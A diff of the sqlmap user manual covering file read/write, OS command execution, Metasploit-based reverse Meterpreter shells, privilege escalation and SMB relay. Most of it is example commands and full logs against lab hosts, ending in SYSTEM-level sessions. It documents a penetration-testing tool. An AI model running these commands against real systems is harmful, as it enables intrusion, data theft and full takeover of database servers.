      
+
+
      If you want, you can specify the shared library local file system path
+via command line using --shared-lib option.
      
+
+
      5.9 File system access
+
      
+
+
      Read a file from the database server's file system
      
+
+
      Option: --read-file
      
 
 
      It is possible to retrieve the content of files from the underlying file
 system when the back-end database management system is either MySQL,
-PostgreSQL or Microsoft SQL Server and the session user has the needed
+PostgreSQL or Microsoft SQL Server, and the session user has the needed
 privileges to abuse database specific functionalities and architectural
 weaknesses.
-The file specified can be either a text or a binary file, sqlmap will
-handle either cases automatically.
      
+The file specified can be either a text or a binary file. sqlmap will
+handle it automatically.
      
 
-
      These techniques are detailed on the white paper
+
      These techniques are detailed in the white paper
 Advanced SQL injection to operating system full control.
      
 
 
      Example on a PostgreSQL 8.3.5 target to retrieve a text file:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.aspx?id=1" \
   --read-file "C:\example.txt" -v 2
 
 [...]
@@ -4011,11 +4349,11 @@ sqlmapfile
 [hh:mm:22] [DEBUG] cleaning up the database management system
 [hh:mm:22] [DEBUG] removing support tables
 [hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile
-C:/example.txt file saved to:    '/home/inquis/sqlmap/output/192.168.1.121/files/C__example.txt'
+C:/example.txt file saved to:    '/home/inquis/sqlmap/output/172.16.213.131/files/C__example.txt'
 
-[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/192.168.1.121'
+[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/172.16.213.131'
 
-$ cat output/192.168.1.121/files/C__example.txt 
+$ cat output/172.16.213.131/files/C__example.txt 
 This is a text file
 
      
 
      
@@ -4026,7 +4364,7 @@ retrieve a binary file:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
   --read-file "C:\example.exe" --union-use -v 1
 
 [...]
@@ -4044,41 +4382,41 @@ injection vulnerability
 'name' by appending a false condition after the parameter value
 [hh:mm:49] [INFO] the target url is affected by an exploitable partial (single entry) 
 inband sql injection vulnerability
-valid union:    'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
+valid union:    'http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
 ALL SELECT NULL, NULL, NULL-- AND 'sjOfJ'='sjOfJ'
 
 [hh:mm:49] [INFO] testing stacked queries support on parameter 'name'
 [hh:mm:54] [INFO] the web application supports stacked queries on parameter 'name'
 [hh:mm:54] [INFO] fetching file: 'C:/example.exe'
 [hh:mm:54] [INFO] the SQL query provided returns 3 entries
-C:/example.exe file saved to:    '/home/inquis/sqlmap/output/192.168.1.121/files/
+C:/example.exe file saved to:    '/home/inquis/sqlmap/output/172.16.213.131/files/
 C__example.exe'
 
 [hh:mm:54] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/
-192.168.1.121'
+172.16.213.131'
 
-$ ls -l output/192.168.1.121/files/C__example.exe 
--rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/192.168.1.121/files/C__example.exe
+$ ls -l output/172.16.213.131/files/C__example.exe 
+-rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/172.16.213.131/files/C__example.exe
 
-$ file output/192.168.1.121/files/C__example.exe 
-output/192.168.1.121/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
+$ file output/172.16.213.131/files/C__example.exe 
+output/172.16.213.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
 
      
 
      
 
      
 
 
-
      Write a local file on the back-end DBMS file system
      
+
      Write a local file on the database server's file system
      
 
-
      Options: --write-file and --dest-file
      
+
      Options: --write-file and --dest-file
      
 
-
      It is possible to upload a local file to the underlying file system when
-the back-end database management system is either MySQL, PostgreSQL or
-Microsoft SQL Server and the session user has the needed privileges to
+
      It is possible to upload a local file to the database server file system
+when the back-end database management system is either MySQL, PostgreSQL
+or Microsoft SQL Server, and the session user has the needed privileges to
 abuse database specific functionalities and architectural weaknesses.
-The file specified can be either a text or a binary file, sqlmap will
-handle either cases automatically.
      
+The file specified can be either a text or a binary file. sqlmap will
+handle it automatically.
      
 
-
      These techniques are detailed on the white paper
+
      These techniques are detailed in the white paper
 Advanced SQL injection to operating system full control.
      
 
 
      Example on a MySQL 5.0.67 target to upload a binary UPX-compressed
@@ -4092,7 +4430,7 @@ $ file /tmp/nc.exe.packed
 $ ls -l /tmp/nc.exe.packed
 -rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
 
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" --write-file \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.aspx?id=1" --write-file \
   "/tmp/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
 
 [...]
@@ -4117,46 +4455,74 @@ same size as the local file '/tmp/nc.exe.packed'
 
      
 
      
 
+
      Example on a PostgreSQL 8.4 target to upload a text file:
      
+
      
+
      
+
      +$ python sqlmap.py -u http://172.16.213.131/sqlmap/pgsql/get_int8.4.php?id=1 \
+  --write-file /etc/passwd --dest-file /tmp/writtenfrompgsql -v 1
 
-
      5.9 Operating system access
+[...]
+web application technology: PHP 5.2.6, Apache 2.2.9
+back-end DBMS: PostgreSQL
+
+[hh:mm:01] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:01] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:01] [INFO] retrieved: 8.4.2
+[hh:mm:07] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:07] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:07] [INFO] retrieved: 0
+[hh:mm:07] [INFO] retrieved: 0
+[hh:mm:07] [INFO] the back-end DBMS operating system is Linux
+do you want confirmation that the file '/tmp/writtenfrompgsql' has been successfully 
+written on the back-end DBMS file system? [Y/n] 
+[hh:mm:14] [INFO] retrieved: 2264
+[hh:mm:14] [INFO] the file has been successfully written and its size is 2264 bytes, 
+same size as the local file '/etc/passwd'
+
      
+
      
+
      
+
+
+
      5.10 Operating system access
 
      
 
 
      Execute arbitrary operating system command
      
 
-
      Options: --os-cmd and --os-shell
      
+
      Options: --os-cmd and --os-shell
      
 
 
      It is possible to execute arbitrary commands on the underlying operating
 system when the back-end database management system is either MySQL,
-PostgreSQL or Microsoft SQL Server and the session user has the needed
+PostgreSQL or Microsoft SQL Server, and the session user has the needed
 privileges to abuse database specific functionalities and architectural
 weaknesses.
      
 
 
      On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality
-demonstrated above) a shared library (binary file) containing two
+explained above) a shared library (binary file) containing two
 user-defined functions, sys_exec() and sys_eval(), then
 it creates these two functions on the database and call one of them to
 execute the specified command, depending on the user's choice to display
 the standard output or not.
 On Microsoft SQL Server, sqlmap abuses the xp_cmshell stored
-procedure: if it's disable sqlmap re-enables it, if it does not exist,
+procedure: if it's disabled, sqlmap re-enables it; if it does not exist,
 sqlmap creates it from scratch.
      
 
 
      If the user wants to retrieve the command standard output, sqlmap will use
 one of the enumeration SQL injection techniques (blind or inband) to
-retrieve it, viceversa sqlmap will use the stacked query SQL injection
-technique to execute the command without returning anything to the user.
      
+retrieve it or, in case of stacked query SQL injection technique,
+sqlmap will execute the command without returning anything to the user.
      
 
-
      These techniques are detailed on the white paper
+
      These techniques are detailed in the white paper
 Advanced SQL injection to operating system full control.
      
 
 
      It is possible to specify a single command to be executed with the
---os-cmd option.
      
+--os-cmd option.
      
 
 
      Example on a PostgreSQL 8.3.5 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/pgsql/get_int.aspx?id=1" \
   --os-cmd "whoami" -v 1
 
 [...]
@@ -4191,7 +4557,7 @@ command standard output:    'w2k3dev\postgres'
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
   --os-cmd "whoami" --union-use -v 1
 
 [...]
@@ -4209,7 +4575,7 @@ injection vulnerability
 by appending a false condition after the parameter value
 [hh:mm:58] [INFO] the target url is affected by an exploitable partial (single entry) inband 
 sql injection vulnerability
-valid union:    'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
+valid union:    'http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
 ALL SELECT NULL, NULL, NULL-- AND 'SonLv'='SonLv'
 
 [hh:mm:58] [INFO] testing stacked queries support on parameter 'name'
@@ -4228,15 +4594,15 @@ nt authority\network service
 
      
 
 
      It is also possible to simulate a real shell where you can type as many
-arbitrary commands as you wish. The option is --os-shell and has
-the same TAB completion and history functionalities implemented for
---sql-shell.
      
+arbitrary commands as you wish. The option is --os-shell and has
+the same TAB completion and history functionalities like
+--sql-shell.
      
 
 
      Example on a MySQL 5.0.67 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.aspx?id=1" \
   --os-shell -v 2
 
 [...]
@@ -4347,13 +4713,13 @@ can only be deleted manually
 
      
 
      
 
-
      Now run it again, but specifying the --union-use to retrieve the
+
      Now run it again, but specifying the --union-use to retrieve the
 command standard output quicker, via UNION based SQL injection, when the
 parameter is affected also by inband SQL injection vulnerability:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.aspx?id=1" \
   --os-shell -v 2 --union-use
 
 [...]
@@ -4367,7 +4733,7 @@ technique
 [hh:mm:16] [INFO] confirming full inband sql injection on parameter 'id'
 [hh:mm:16] [INFO] the target url is affected by an exploitable full inband sql injection 
 vulnerability
-valid union:    'http://192.168.1.121:80/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT 
+valid union:    'http://172.16.213.131/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT 
 NULL, NULL, NULL# AND 528=528'
 
 [hh:mm:16] [INFO] testing stacked queries support on parameter 'id'
@@ -4432,9 +4798,9 @@ Windows IP Configuration
 Ethernet adapter Local Area Connection 2:
 
    Connection-specific DNS Suffix  . : localdomain
-   IP Address. . . . . . . . . . . . : 192.168.1.121
+   IP Address. . . . . . . . . . . . : 172.16.213.131
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
----Default Gateway . . . . . . . . . : 192.168.1.1
+---Default Gateway . . . . . . . . . : 172.16.213.1
 
 os-shell> exit
 [hh:mm:41] [INFO] cleaning up the database management system
@@ -4455,103 +4821,115 @@ user-defined functions are already created, if so, it asks the user if he
 wants to recreate them or keep them and save time.
      
 
 
-
      Prompt for an out-of-band shell, meterpreter or VNC
      
+
      Prompt for an out-of-band shell, Meterpreter or VNC
      
 
-
      Options: --os-pwn, --priv-esc, --msf-path and --tmp-path
      
+
      Options: --os-pwn, --priv-esc, --msf-path and --tmp-path
      
 
-
      It is possible to establish an out-of-band TCP stateful channel
-between the attacker and the underlying operating system by using the
-exploited SQL injection as a stepping stone. This is implemented for MySQL,
-PostgreSQL and Microsoft SQL Server.
-sqlmap relies on the 
-Metasploit to perform this attack, so you need to have it already
-on your system: it's free and can be downloaded from the homepage. It is
-required to use Metasploit Framework version 3.3 or above.
      
+
      It is possible to establish an out-of-band stateful TCP connection
+between the user machine and the database server underlying operating
+system. This channel can be an interactive command prompt, a Meterpreter
+session or a graphical user interface (VNC) session as per user's choice.
+sqlmap relies on Metasploit to create the shellcode and implements four
+different techniques to execute it on the database server. These
+techniques are:
+
        
+
      • Database in-memory execution of the Metasploit's shellcode
+via sqlmap own user-defined function sys_bineval(). Supported on
+MySQL and PostgreSQL.
        • 
+
      • Upload and execution of a Metasploit's stand-alone payload
+stager via sqlmap own user-defined function sys_exec() on
+MySQL and PostgreSQL or via xp_cmdshell() on Microsoft SQL
+Server.
        • 
+
      • Execution of Metasploit's shellcode by performing a SMB
+reflection attack (
+MS08-068) with a UNC path request from the database server to
+the user's machine where the Metasploit smb_relay server exploit
+runs.
        • 
+
      • Database in-memory execution of the Metasploit's shellcode by
+exploiting Microsoft SQL Server 2000 and 2005
+sp_replwritetovarbin stored procedure heap-based buffer
+overflow (
+MS09-004) with automatic DEP bypass.
        • 
+
      
+
      
 
 
      Note that this feature is not supported by sqlmap running on Windows
-because Metasploit's msfconsole and msfcli are not supported on the native
-Windows Ruby interpreter.
      
+because it relies on Metasploit's msfcli which is not
+available for Windows.
      
 
-
      These techniques are detailed on the white paper
-Advanced SQL injection to operating system full control.
      
+
      These techniques are detailed in the white paper
+Advanced SQL injection to operating system full control and in the
+slide deck 
+Expanding the control over the operating system from the database.
      
 
-
      Example on a MySQL 5.0.67 target:
      
+
      Example on a MySQL 5.1 target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" \
+$ python sqlmap.py -u "http://172.16.213.128/sqlmap/mysql/get_int_51.aspx?id=1" \
   --os-pwn -v 1 --msf-path /home/inquis/software/metasploit
 
 [...]
-[hh:mm:17] [INFO] the back-end DBMS is MySQL
 web server operating system: Windows 2003 or 2008
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
 back-end DBMS: MySQL >= 5.0.0
 
-[hh:mm:17] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:17] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:17] [INFO] retrieved: 5.0.67
-[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:23] [INFO] retrieved: C
-[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:23] [INFO] testing if current user is DBA
-[hh:mm:23] [INFO] retrieved: 1
-[hh:mm:23] [INFO] checking if sys_exec UDF already exist
-[hh:mm:23] [INFO] retrieved: 1
-[hh:mm:24] [INFO] sys_exec UDF already exists, do you want to overwrite it? [y/N] N
-[hh:mm:24] [INFO] checking if sys_eval UDF already exist
-[hh:mm:24] [INFO] retrieved: 1
-[hh:mm:24] [INFO] sys_eval UDF already exists, do you want to overwrite it? [y/N] N
-[hh:mm:24] [INFO] creating Metasploit Framework 3 payload stager
-[hh:mm:24] [INFO] which connection type do you want to use?
-[1] Bind TCP (default)
-[2] Bind TCP (No NX)
-[3] Reverse TCP
-[4] Reverse TCP (No NX)
+[hh:mm:09] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:09] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:09] [INFO] retrieved: 5.1.30
+[hh:mm:18] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:18] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:18] [INFO] retrieved: C
+[hh:mm:19] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:19] [INFO] testing if current user is DBA
+[hh:mm:19] [INFO] retrieved: 1
+[hh:mm:20] [INFO] checking if UDF 'sys_bineval' already exist
+[hh:mm:20] [INFO] retrieved: 0
+[hh:mm:21] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:21] [INFO] retrieved: 0
+[hh:mm:21] [INFO] retrieving MySQL base directory absolute path
+[hh:mm:21] [INFO] retrieved: C:\Program Files\MySQL\MySQL Server 5.1\
+[hh:mm:46] [WARNING] this will only work if the database administrator created manually 
+the 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin' subfolder
+[hh:mm:47] [INFO] creating UDF 'sys_bineval' from the binary UDF file
+[hh:mm:47] [INFO] creating UDF 'sys_exec' from the binary UDF file
+how do you want to execute the Metasploit shellcode on the back-end database underlying 
+operating system?
+[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
+[2] Stand-alone payload stager (file system way)
 > 1
-[hh:mm:24] [INFO] which is the back-end DBMS address? [192.168.1.121] 192.168.1.121
-[hh:mm:24] [INFO] which remote port numer do you want to use? [61588] 61588
-[hh:mm:24] [INFO] which payload do you want to use?
-[1] Reflective Meterpreter (default)
-[2] PatchUp Meterpreter (only from Metasploit development revision 6742)
-[3] Shell
-[4] Reflective VNC
-[5] PatchUp VNC (only from Metasploit development revision 6742)
+[hh:mm:51] [INFO] creating Metasploit Framework 3 multi-stage shellcode 
+which connection type do you want to use?
+[1] Reverse TCP: Connect back from the database host to this machine (default)
+[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
+between the specified and 65535
+[3] Bind TCP: Listen on the database host for a connection
 > 1
-[hh:mm:24] [INFO] which payload encoding do you want to use?
-[1] No Encoder
-[2] Alpha2 Alphanumeric Mixedcase Encoder
-[3] Alpha2 Alphanumeric Uppercase Encoder
-[4] Avoid UTF8/tolower
-[5] Call+4 Dword XOR Encoder
-[6] Single-byte XOR Countdown Encoder
-[7] Variable-length Fnstenv/mov Dword XOR Encoder
-[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
-[9] Non-Alpha Encoder
-[10] Non-Upper Encoder
-[11] Polymorphic XOR Additive Feedback Encoder (default)
-[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
-[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
-> 11
-[hh:mm:24] [INFO] creation in progress .................. done
-[hh:mm:42] [INFO] compression in progress . quit unexpectedly with return code 1
-[hh:mm:43] [INFO] failed to compress the file because you provided a Metasploit version 
-above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
-It might only slow down a bit the execution of sqlmap
-[hh:mm:43] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfgcpge.exe'
-[hh:mm:44] [INFO] running Metasploit Framework 3 command line interface locally, wait..
-[hh:mm:44] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
+which is the local address? [172.16.213.1] 
+which local port number do you want to use? [47776] 
+which payload do you want to use?
+[1] Meterpreter (default)
+[2] Shell
+[3] VNC
+> 1
+[hh:mm:55] [INFO] creation in progress .............................................. done
+[hh:mm:41] [INFO] running Metasploit Framework 3 command line interface locally, wait..
 [*] Please wait while we load the module tree...
-[*] Started bind handler
+[*] Started reverse handler on 172.16.213.1:47776 
 [*] Starting the payload handler...
-[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
-[*] Sending stage (718336 bytes)
-[*] Meterpreter session 1 opened (192.168.1.161:47832 -> 192.168.1.121:61588)
+[hh:mm:22] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval', wait..
+[*] Sending stage (748032 bytes)
+[*] Meterpreter session 1 opened (172.16.213.1:47776 -> 172.16.213.128:2176)
 
+meterpreter > Loading extension espia...success.
+meterpreter > Loading extension incognito...success.
 meterpreter > Loading extension priv...success.
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
+meterpreter > Loading extension sniffer...success.
+meterpreter > Computer: W2K3DEV
+OS      : Windows .NET Server (Build 3790, Service Pack 2).
+Arch    : x86
+Language: en_US
+meterpreter > Server username: NT AUTHORITY\SYSTEM
 meterpreter > ipconfig
 
 MS TCP Loopback interface
@@ -4561,78 +4939,72 @@ Netmask     : 255.0.0.0
 
 
 
-VMware Accelerated AMD PCNet Adapter
-Hardware MAC: 00:0c:29:29:ee:86
-IP Address  : 192.168.1.121
+VMware Accelerated AMD PCNet Adapter #2
+Hardware MAC: 00:0c:29:86:69:1b
+IP Address  : 172.16.213.128
 Netmask     : 255.255.255.0
 
 
-meterpreter > pwd
-C:\Program Files\MySQL\MySQL Server 5.0\Data
 meterpreter > exit
+
+[hh:mm:52] [INFO] cleaning up the database management system
+do you want to remove UDF 'sys_bineval'? [Y/n] 
+do you want to remove UDF 'sys_exec'? [Y/n] 
+[hh:mm:54] [INFO] database management system cleanup finished
+[hh:mm:54] [WARNING] remember that UDF dynamic-link library files and Metasploit related 
+files in the temporary folder saved on the file system can only be deleted manually
 
      
 
      
 
      
 
 
      By default MySQL on Windows runs as SYSTEM, however PostgreSQL
-run as a low-privileged user postgres on both Windows and Linux.
+runs as a low-privileged user postgres on both Windows and Linux.
 Microsoft SQL Server 2000 by default runs as SYSTEM, whereas
 Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK
 SERVICE and sometimes as LOCAL SERVICE.
      
-
      It is possible to provide sqlmap with the --priv-esc option to
-abuse Windows access tokens and escalate privileges to SYSTEM
-within the Meterpreter session created if the underlying operating system
-is not patched against Microsoft Security Bulletin
-MS09-012.
-sqlmap performs the
-Windows Token kidnapping
-technique by uploading 
+
      It is possible to provide sqlmap with the --priv-esc
+option to perform a database process' user privilege escalation
+via Metasploit's getsystem command which include, among others,
+the 
+kitrap0d technique (
+MS10-015) or via 
+Windows Access Tokens kidnapping by using either Meterpreter's
+incognito extension or 
 Churrasco
-local exploit and using it to call the Metasploit's payload stager
-executable. sqlmap uses also the Metasploit's Meterpreter
-incognito
-extension to abused Windows access tokens in conjunction to Churrasco
-stand-alone exploit if the user wants so.
      
-
-
      Note that this feature is not supported by sqlmap installed from the
-DEB package because it relies on Churrasco, which is not explicitly free
-software so it has not been included in the package.
      
-
-
      This technique is detailed on the white paper
-Advanced SQL injection to operating system full control.
      
+(
+MS09-012) stand-alone executable as per user's choice.
      
 
 
      Example on a Microsoft SQL Server 2005 Service Pack 0 running as
 NETWORK SERVICE on the target:
      
 
      
 
      
 
      -$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+$ python sqlmap.py -u "http://172.16.213.128/sqlmap/mssql/iis/get_int.asp?id=1" \
   --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc
 
 [...]
-[hh:mm:17] [INFO] the back-end DBMS is Microsoft SQL Server
 web server operating system: Windows 2000
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP
 back-end DBMS: Microsoft SQL Server 2005
 
-[hh:mm:17] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:22] [INFO] the web application supports stacked queries on parameter 'name'
-[hh:mm:22] [INFO] testing if current user is DBA
-[hh:mm:22] [INFO] retrieved: 1
-[hh:mm:23] [INFO] checking if xp_cmdshell extended procedure is available, wait..
-[hh:mm:29] [INFO] xp_cmdshell extended procedure is available
-[hh:mm:29] [INFO] creating Metasploit Framework 3 payload stager
+[hh:mm:47] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:52] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:52] [INFO] testing if current user is DBA
+[hh:mm:52] [INFO] retrieved: 1
+[hh:mm:52] [INFO] checking if xp_cmdshell extended procedure is available, wait..
+[hh:mm:01] [INFO] xp_cmdshell extended procedure is available
+[hh:mm:01] [INFO] creating Metasploit Framework 3 payload stager
 which connection type do you want to use?
-[1] Bind TCP (default)
-[2] Bind TCP (No NX)
-[3] Reverse TCP
-[4] Reverse TCP (No NX)
-> 3
-which is the local address? [192.168.1.161] 
-which local port numer do you want to use? [61499] 
-[hh:mm:54] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload 
-that can be used to abuse Windows Impersonation Tokens via Meterpreter 'incognito' 
-extension to privilege escalate
+[1] Reverse TCP: Connect back from the database host to this machine (default)
+[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
+between the specified and 65535
+[3] Bind TCP: Listen on the database host for a connection
+> 1
+which is the local address? [172.16.213.1] 
+which local port number do you want to use? [44780] 
+[hh:mm:52] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload 
+that can be used to escalate privileges, either via 'incognito' extension or via 
+'getsystem' command
 which payload encoding do you want to use?
 [1] No Encoder
 [2] Alpha2 Alphanumeric Mixedcase Encoder
@@ -4648,39 +5020,35 @@ which payload encoding do you want to use?
 [12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
 [13] Alpha2 Alphanumeric Unicode Uppercase Encoder
 > 
-[hh:mm:58] [INFO] creation in progress .................. done
-[hh:mm:16] [INFO] compression in progress . quit unexpectedly with return code 1
-[hh:mm:17] [INFO] failed to compress the file because you provided a Metasploit version 
-above 3.3-dev revision 6681. This will not inficiate the correct execution of sqlmap. 
-It might only slow down a bit the execution of sqlmap
-[hh:mm:17] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfyahls.exe'
-[hh:mm:20] [WARNING] often Microsoft SQL Server 2005 runs as Network Service which has no 
-Windows Impersonation Tokens within all threads, this makes Meterpreter's incognito 
-extension to fail to list tokens
+[hh:mm:53] [INFO] creation in progress ..... done
+[hh:mm:58] [INFO] compression in progress . done
+[hh:mm:59] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/tmpmqyws.exe'
 do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its 
-argument so that it will be started as SYSTEM? [Y/n] y
-[hh:mm:36] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into 
-chunks, upload them and recreate the original file out of the binary chunks server-side, 
-wait..
-[hh:mm:22] [INFO] file chunk 1 written
-[14:10:06] [INFO] file chunk 2 written
-[14:10:06] [INFO] running Metasploit Framework 3 command line interface locally, wait..
+argument so that it will be started as SYSTEM? [y/N] 
+[hh:mm:22] [INFO] running Metasploit Framework 3 command line interface locally, wait..
 [*] Please wait while we load the module tree...
-[*] Handler binding to LHOST 0.0.0.0
-[*] Started reverse handler
+[*] Started reverse handler on 172.16.213.1:44780 
 [*] Starting the payload handler...
-[14:10:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
-[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
-[*] Sending stage (718336 bytes)
-[*] Meterpreter session 1 opened (192.168.1.161:61499 -> 192.168.1.131:3221)
+[hh:mm:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
+[*] Sending stage (748032 bytes)
+[*] Meterpreter session 1 opened (172.16.213.1:44780 -> 172.16.213.128:2185)
 
 meterpreter > 
-[14:11:01] [INFO] loading Meterpreter 'incognito' extension and displaying the list of 
-Access Tokens availables. Choose which user you want to impersonate by using incognito's 
-command 'impersonate_token'
-Loading extension priv...success.
+[hh:mm:34] [INFO] trying to escalate privileges using Meterpreter 'getsystem' command which 
+tries different techniques, including kitrap0d
+[hh:mm:34] [INFO] displaying the list of Access Tokens availables. Choose which user you 
+want to impersonate by using incognito's command 'impersonate_token' if 'getsystem' did not 
+success to elevate privileges
+Loading extension espia...success.
 meterpreter > Loading extension incognito...success.
-meterpreter > Server username: NT AUTHORITY\SYSTEM
+meterpreter > Loading extension priv...success.
+meterpreter > Loading extension sniffer...success.
+meterpreter > Computer: W2K3DEV
+OS      : Windows .NET Server (Build 3790, Service Pack 2).
+Arch    : x86
+Language: en_US
+meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > ...got system (via technique 4).
 meterpreter > 
 Delegation Tokens Available
 ========================================
@@ -4688,16 +5056,34 @@ NT AUTHORITY\LOCAL SERVICE
 NT AUTHORITY\NETWORK SERVICE
 NT AUTHORITY\SYSTEM
 W2K3DEV\Administrator
-W2K3DEV\IUSR_WIN2003
+W2K3DEV\IUSR_W2K3STENSP0
 W2K3DEV\postgres
 
 Impersonation Tokens Available
 ========================================
 NT AUTHORITY\ANONYMOUS LOGON
 
+meterpreter > Server username: NT AUTHORITY\SYSTEM
+meterpreter > ipconfig
+
+MS TCP Loopback interface
+Hardware MAC: 00:00:00:00:00:00
+IP Address  : 127.0.0.1
+Netmask     : 255.0.0.0
+
+
+
+VMware Accelerated AMD PCNet Adapter #2
+Hardware MAC: 00:0c:29:86:69:1b
+IP Address  : 172.16.213.128
+Netmask     : 255.255.255.0
+
+
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
 meterpreter > exit
+
+[hh:mm:52] [INFO] cleaning up the database management system
 
      
 
      
 
      
@@ -4705,31 +5091,28 @@ meterpreter > exit
 
 
      One click prompt for an out-of-band shell, meterpreter or VNC
      
 
-
      Options: --os-smbrelay, --priv-esc and --msf-path
      
+
      Options: --os-smbrelay, --priv-esc and --msf-path
      
 
-
      If the back-end database management system runs as Administrator
-and the underlying operating system is not patched against Microsoft
+
      If the back-end database management system runs on Windows as
+Administrator and the system is not patched against Microsoft
 Security Bulletin 
-MS08-068,
-sqlmap can abuse the universal naming convention (UNC) supported within
-all database management systems to force the database server to initiate a
-SMB connection with the attacker host, then perform a SMB authentication
-relay attack in order to establish a high-privileged out-of-band TCP
-stateful channel between the attacker host and the target database
-server.
+MS08-068, sqlmap can abuse the universal naming convention (UNC)
+feature within any database management system to force the database server
+to initiate a SMB connection with the attacker host, then perform a SMB
+authentication relay attack in order to establish a high-privileged
+out-of-band TCP stateful channel between the attacker host and
+the target database server.
 sqlmap relies on 
-Metasploit's SMB relay exploit to perform this attack, so you need
-to have it already on your system: it's free and can be downloaded from the
-homepage.
-You need to run sqlmap as root user if you want to perform a SMB
-relay attack because it will need to listen on a user-specified SMB TCP
-port for incoming connection attempts.
      
+Metasploit's SMB relay exploit to perform this attack.
+You need to run sqlmap as a privileged user (e.g. root) if you
+want to perform a SMB relay attack because it will need to listen on a
+user-specified SMB TCP port for incoming connection attempts.
      
 
 
      Note that this feature is not supported by sqlmap running on Windows
-because Metasploit's msfconsole and msfcli are not supported on the native
-Windows Ruby interpreter.
      
+platform because it relies on Metasploit's msfpayload which is
+not fully working on Windows.
      
 
-
